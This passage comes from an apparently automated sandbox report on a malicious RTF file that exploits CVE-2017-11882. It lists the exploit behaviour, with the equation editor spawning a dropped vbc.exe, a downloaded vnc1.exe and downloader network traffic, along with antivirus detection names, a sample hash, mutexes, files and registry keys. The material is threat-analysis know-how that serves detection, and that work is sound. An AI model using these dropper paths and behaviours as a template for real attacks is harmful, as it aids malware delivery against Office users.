  633. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010l\\xe4\\xa6\\xc7\\xce\\xfc2<\\x05\\xdd<n\\xbb\\x86t\\x81\\x95\\xea\\xb7\\x9c\\xe0\\x077d\\xf0\\xf2`\\xaeq\\x9b'\\x99\\x15\\xda\\x94\\x90\\xd1o\\x9a\\xcd\\x08i\\x1f\n o\\x1b\\xe3\\xe0w\\xe0i\\xdc=/\\x869\\x07d\\xd0=\\x1f\\x0f\\x0c\\xb1*\\xc0\\xbf\\xb13t\\x02_\t\\\\x98#\\xc9\\x9a\\x87\\xf0\\x1e1)!\\xfb\\xcb\\x0f\\x07y<\\xa5\\xbcc\\x07\\x15ycj\\xbe\\xb0\\xe3q\\x80e\\x85\r\\xf9\\x12\\xf9u\\xf2\\x10\\xeb\\x80\\xc2\\xab\\xe76\\x90\\xc5\\xabb\\xabsx\\xf4\\xa3(\\x82\\xfc\\xc3\\xdf\\x95\\xcf\\x04\\x14h\\x8c\\xfact\\x14%g\\x91@\\x94\\xc7\\xe8|\\x94\\x84\ta\\xec#m\\xbdq\\xcb\\xfc\\xffesx!\\xf4q\\xaeh\\xb9\\xe5t3o5\\x9a\\x99\\xc8k\\xd0\\xca\\xcc\\xab\\xeb#\\x89\\x94\\xbf\\xf8^\\xaa\\xe5oo~\\xad\\x1c.\\xee\\x9a\\xe3\\x98ims\\x0br\\x97t\\xa5\\xc3\\xa7\\xd6z\\x94\\xcd\\x81\\x8az\\x1b\\x00\\xc18\\x8a\\x8fs\\xcf\\x84\\xd1\\xf1\\xdf\\xc3\\xad\\x9f\\x00\\xfbwt\\xbe\\x81\\xa3"
  634.  
  635.  
  636. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbb\\xd3\\x8f\\xd9\\xd2\\xba\\xd9%x\\x7f\\xd1\\xef\\x08vu\\xec\\xed\\xe3\\x04\\xd0d\\xe1\\xf2\\x8c\\xd2\\xbf\\\\x8c\\xe9y\\xe8gi\\x07\\xca\\xb3\\xc0l|\\xa6\\xb9\\xf8\\x0c\\xd1\\xe0\\xc9>\\xb5\\x88\\x9di\\xbc\\xf4\\xb8\\xd2g-w\\xd8<rk5*\\x8dn\\xc5\\xda\\x1a\\x16\\x12\\x95\\xbd\\xfbuo\\x0f\\x84xaa\\xe8\\x98\\xa81o>y\\xb8\\x13\t\\x1e\\xcb-g\\xefh\\xd3/y1\\xff\\xdb\\xc3@\\xc8\\x02u\\xf8q\\x1c\\x9a\\x1ev w\\x13\\xc5\\xa6\\x9d\\xa4\\xae\\x11\\xf49\\x91\\x1ae\\x97,7:\\x90\\xae\\xc4\\xe5\\xfd\\x90\\xe4l\\xc9\\x9blv\\xafm\\xa1\\xd4\\xa3m\\xe1\\xdf\\xdb?\\x035^w\\xb8\\x0b\\x04t7\\xb1\\x81\\x19\\xfc\\x03\\x00\\x85\\xcci\\x01s\\x12\\xb5\\xf3\\x9c\\x13y&\\xf91\\xc7\\xeb\\xca\\xa0p\\xde\\x9aa\\xe6\\xdb\\x03b\\xdf\\x9f|\\x98f=\\xee\\xb5nd\\x7f\\x9d4s\\xe2\\x97\\x19.n\\x830\\xa7\\xd9\\xa1\\x9b\\xbc\\xa9\\x0e\\xe2\\xa2\\x8as\\xf4_u\\xe2l\\x98&\\xe2\\x9e\\x13\\xa0\\xdek\t\\xdah\\xc4o\\x9arv"
  637.  
  638.  
  639.  
  640.  
  641. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
  642. "Details":
  643.  
  644. "created_process": "\"C:\\Users\\Public\\vbc.exe\" "
  645.  
  646.  
  647.  
  648.  
  649. "Description": "Creates a hidden or system file",
  650. "Details":
  651.  
  652. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$n0Eo2U.doc"
  653.  
  654.  
  655. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
  656.  
  657.  
  658.  
  659.  
  660. "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  661. "Details":
  662.  
  663. "MicroWorld-eScan": "Exploit.RTF-ObfsObjDat.Gen"
  664.  
  665.  
  666. "FireEye": "Exploit.RTF-ObfsObjDat.Gen"
  667.  
  668.  
  669. "McAfee": "Exploit-CVE2017-11882.by"
  670.  
  671.  
  672. "Arcabit": "Exploit.RTF-ObfsObjDat.Gen"
  673.  
  674.  
  675. "Symantec": "Exp.CVE-2017-11882!g3"
  676.  
  677.  
  678. "Avast": "RTF:CVE-2017-11882-A Expl"
  679.  
  680.  
  681. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
  682.  
  683.  
  684. "BitDefender": "Exploit.RTF-ObfsObjDat.Gen"
  685.  
  686.  
  687. "Ad-Aware": "Exploit.RTF-ObfsObjDat.Gen"
  688.  
  689.  
  690. "Sophos": "Troj/RtfExp-EQ"
  691.  
  692.  
  693. "McAfee-GW-Edition": "Exploit-CVE2017-11882.by"
  694.  
  695.  
  696. "Emsisoft": "Exploit.RTF-ObfsObjDat.Gen (B)"
  697.  
  698.  
  699. "Cyren": "CVE-2017-11882.C.gen!Camelot"
  700.  
  701.  
  702. "MAX": "malware (ai score=88)"
  703.  
  704.  
  705. "Antiy-AVL": "TrojanExploit/RTF.CVE-2017-11882"
  706.  
  707.  
  708. "Microsoft": "Exploit:O97M/CVE-2017-11882.K"
  709.  
  710.  
  711. "ZoneAlarm": "HEUR:Exploit.MSOffice.Generic"
  712.  
  713.  
  714. "GData": "Exploit.RTF-ObfsObjDat.Gen"
  715.  
  716.  
  717. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
  718.  
  719.  
  720. "ALYac": "Exploit.RTF-ObfsObjDat.Gen"
  721.  
  722.  
  723. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  724.  
  725.  
  726. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.E"
  727.  
  728.  
  729. "Ikarus": "Exploit.CVE-2017-11882"
  730.  
  731.  
  732. "AVG": "RTF:CVE-2017-11882-A Expl"
  733.  
  734.  
  735.  
  736.  
  737. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  738. "Details":
  739.  
  740. "target": "clamav:Rtf.Dropper.Agent-7156378-0, sha256:790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9, type:Rich Text Format data, version 1, unknown character set"
  741.  
  742.  
  743. "dropped": "clamav:Rtf.Dropper.Agent-7156378-0, sha256:790666229814b82c78583a5adda3ef277a3f9eec30d90b2a78b56e269f89b0a9 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\awn0Eo2U.doc, type:Rich Text Format data, version 1, unknown character set"
  744.  
  745.  
  746.  
  747.  
  748. "Description": "Drops a binary and executes it",
  749. "Details":
  750.  
  751. "binary": "C:\\Users\\Public\\vbc.exe"
  752.  
  753.  
  754.  
  755.  
  756. "Description": "Created network traffic indicative of malicious activity",
  757. "Details":
  758.  
  759. "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
  760.  
  761.  
  762.  
  763.  
  764.  
  765. * Started Service:
  766. "osppsvc"
  767.  
  768.  
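  769. * Mutexes (note: the names below appear to be ones routinely created by Office, MSCTF and WMI rather than by the sample, so treat them as weak indicators):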
  770. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  771. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  772. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  773. "CicLoadWinStaWinSta0",
  774. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  775. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
  776. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
  777. "Global\\ADAP_WMI_ENTRY",
  778. "Global\\RefreshRA_Mutex",
  779. "Global\\RefreshRA_Mutex_Lib",
  780. "Global\\RefreshRA_Mutex_Flag"
  781.  
  782.  
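  783. * Modified Files (note: most entries appear to be Word temp/recovery files and CryptnetUrlCache / cab*.tmp certificate-cache artifacts; the executable written under Content.IE5 is the entry to prioritise when triaging):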
  784. "C:\\Users\\user\\AppData\\Local\\Temp\\awn0Eo2U.doc",
  785. "C:\\Users\\user\\AppData\\Local\\Temp\\~$n0Eo2U.doc",
  786. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF72247552-6467-4E05-BFA4-8529ADF71DBF.tmp",
  787. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  788. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  789. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  790. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  791. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8A3D.tmp",
  792. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8A3E.tmp",
  793. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSB83840AA-137C-432B-9DD4-0A4156485FDE.tmp",
  794. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of awn0Eo2U.asd",
  795. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  796. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
  797. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF46871C9E271D3114.TMP",
  798. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB21A.tmp",
  799. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB26A.tmp",
  800. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB269.tmp",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB27C.tmp",
  802. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3A7.tmp",
  803. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3A8.tmp",
  804. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB27B.tmp",
  805. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB3B9.tmp",
  806. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB28D.tmp",
  807. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB437.tmp",
  808. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB457.tmp",
  809. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB458.tmp",
  810. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5A2.tmp",
  811. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5B3.tmp",
  812. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5C3.tmp",
  813. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB5F3.tmp",
  814. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB613.tmp",
  815. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB624.tmp",
  816. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB636.tmp",
  817. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB635.tmp",
  818. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB468.tmp",
  819. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB711.tmp",
  820. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB760.tmp",
  821. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB85B.tmp",
  822. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB8F9.tmp",
  823. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB919.tmp",
  824. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB92B.tmp",
  825. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB92A.tmp",
  826. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBAB3.tmp",
  827. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB94B.tmp",
  828. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBC8A.tmp",
  829. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBC89.tmp",
  830. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD",
  831. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD",
  832. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBD18.tmp",
  833. "C:\\Users\\user\\AppData\\Local\\Temp\\cabBD76.tmp",
  834. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\vnc1.exe",
  835. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  836.  
  837.  
  838. * Deleted Files:
  839. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8A3D.tmp",
  840. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8A3E.tmp",
  841. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  842. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
  843. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of awn0Eo2U.asd",
  844. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
  845. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
  846.  
  847.  
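  848. * Modified Registry Keys (note: the Office 15.0 Resiliency, Roaming and ServicesManagerCache keys listed here appear to be routine Word start-up writes, not persistence; confirm against a clean baseline before using them as indicators):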
  849. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\yn",
  850. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  851. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  852. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  853. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  854. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  855. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  856. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  857. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403",
  859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403\\1660403",
  860. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  861. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
  862. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
  863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
  864. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
  867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
  868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
  869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
  870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
  871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
  872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
  873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
  874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
  875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
  876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
  877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
  878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
  879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
  880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
  881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
  882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
  883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
  884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
  885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
  886. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
  887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
  888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
  889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
  890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
  891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
  892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
  893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
  894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
  895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
  896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
  897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
  898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
  899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
  900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
  901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
  902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
  903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
  904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
  905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
  906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
  907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
  908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
  909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
  910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
  911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
  912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
  913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
  914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
  915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
  916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
  917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
  918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
  919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
  920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
  921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
  922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
  923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
  924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
  925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
  926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
  927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
  928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
  929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
  930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
  931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
  932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
  933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
  934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
  935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
  936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
  937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
  938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
